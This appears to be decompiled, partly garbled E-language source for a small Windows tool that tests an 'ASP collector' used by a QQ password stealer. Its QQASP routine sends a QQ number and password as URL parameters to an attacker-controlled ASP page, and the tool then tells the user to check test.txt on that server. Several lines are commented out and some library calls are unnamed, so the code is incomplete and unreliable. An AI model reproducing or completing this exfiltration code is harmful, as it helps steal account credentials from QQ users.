 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 233
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假





 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' internet 707ca37322474f6ca841f0e224f4b620 1 0 互联网支持库
 ' xplib 7F54B9CE8887428dBA9CEEB94CEF4C72 1 6 XP风格界面库





.窗口程序集 窗口程序集1, , , 

.子程序 __启动窗口_创建完毕, 空白型, , 
 ' 未知支持库函数_0 (1)












.子程序 _按钮1_被单击, 空白型, , 
.局部变量 ASP收信, 文本型, , , 

 ' .如果真 (等于 (.内容, “”))
    信息框 (“耍老子呢？好玩是吧？”, 0, )
    返回 ()
.如果真结束
 ' .如果真 (等于 (.内容, “”))
    信息框 (“耍老子呢？好玩是吧？”, 0, )
    返回 ()
    
.如果真结束
赋值 (ASP收信, .内容)
 ' .如果真 (不等于 (ASP收信, 取重复文本 (60, “H”)))
     ' .如果真 (等于 (QQASP (ASP收信, .内容, .内容), “发送成功”))
        
    .如果真结束
     ' 信息框 (“发送成功,去你的ASP空间找test.txt查看，如果你是乱填的ASP或者写错了甚至你的空间根本就不支持ASP的话你就回家睡觉去吧”, 0, )
    
.如果真结束


.子程序 QQASP, 文本型, , 发送帐号密码到ASP收信
.参数 地址, 文本型, , ASP文件路径
.参数 号码, 文本型, , 
.参数 密码, 文本型, , 

 ' 返回 (到文本 (未知支持库函数_7 (相加 (地址, “?”, “number=”, 号码, “&password=”, 密码))))

.子程序 _编辑框1_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

赋值 (.内容, “”)




 ' 不属于任何一个程序集、类模块的函数：
